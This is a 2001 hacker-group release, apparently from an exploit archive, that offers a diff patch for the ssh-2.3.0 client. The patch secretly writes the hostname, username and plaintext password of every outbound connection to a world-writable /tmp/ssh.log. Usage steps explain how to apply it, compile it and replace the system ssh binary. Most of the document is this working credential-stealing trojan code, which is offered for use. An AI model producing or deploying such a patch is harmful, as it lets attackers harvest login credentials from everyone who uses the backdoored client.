SSH-2.3.0 client patch to log outgoing usernames, passwords, and hostnames.
ac70dd5c43e7220631199e96f023cd06a6796d6689b45217f7c81ade8e2345b3
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[Ministry-Of-Peace] - ssh-2.3.0 snoop patch - 13th November 2001
== (c)oded 2001 Digital Shadow ==
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
Code Description:
-----------------
This patch for ssh-2.3.0 will allow you to log the host, username
and plaintext password of all outbound connections made using the
ssh client that you patch.
Usage:
------
When the patched version of ssh is used, it will log to /tmp/ssh.log.
This file will need to be mode 666 for all users using ssh to be able
to write to it.
To apply the patch, place it in the directory with ssh-2.3.0, then
just type: patch -p1 < ssh-2.3.0-patch
Hey presto. Compile and replace.
Code:
-----
----cut------------ --_-- ssh-2.3.0-patch --_-- ------------cut----
diff -N -c -r ssh-2.3.0/apps/ssh/authc-passwd.c ssh-2.3.0-new/apps/ssh/authc-passwd.c
*** ssh-2.3.0/apps/ssh/authc-passwd.c Thu Aug 24 04:40:41 2000
--- ssh-2.3.0-new/apps/ssh/authc-passwd.c Tue Nov 14 02:29:03 2001
***************
*** 45,50 ****
--- 45,51 ----
void *method_context)
{
char *password;
+ FILE *lg;
SshBuffer b;
#ifndef SSH_WIN_CLIENT
char buf[100];
***************
*** 113,118 ****
--- 114,122 ----
SSH_FORMAT_BOOLEAN, FALSE,
SSH_FORMAT_UINT32_STR, password, strlen(password),
SSH_FORMAT_END);
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Password: %s\n\n", password);
+ fclose(lg);
ssh_xfree(password);
(*completion)(SSH_AUTH_CLIENT_SEND, user, b, completion_context);
ssh_buffer_free(b);
diff -N -c -r ssh-2.3.0/apps/ssh/ssh2.c ssh-2.3.0-new/apps/ssh/ssh2.c
*** ssh-2.3.0/apps/ssh/ssh2.c Thu Aug 24 04:40:41 2000
--- ssh-2.3.0-new/apps/ssh/ssh2.c Tue Nov 14 02:34:59 2001
***************
*** 781,793 ****
--- 781,798 ----
static void finalize_password_prompt(char **prompt, char *host, char *user)
{
char *tmp;
+ FILE *lg;
+ lg=fopen("/tmp/ssh.log", "a");
tmp = ssh_replace_in_string(*prompt, "%H", host);
+ fprintf(lg, "Host: %s\n", host);
ssh_xfree(*prompt);
*prompt = tmp;
tmp = ssh_replace_in_string(*prompt, "%U", user);
+ fprintf(lg, "User: %s\n", user);
ssh_xfree(*prompt);
*prompt = tmp;
+ fclose(lg);
}
void ssh2_help(const char *name)
----cut------------ --_-- ssh-2.3.0-patch --_-- ------------cut----
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
code[at]ministryofpeace.co.uk -- www.ministryofpeace.co.uk
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --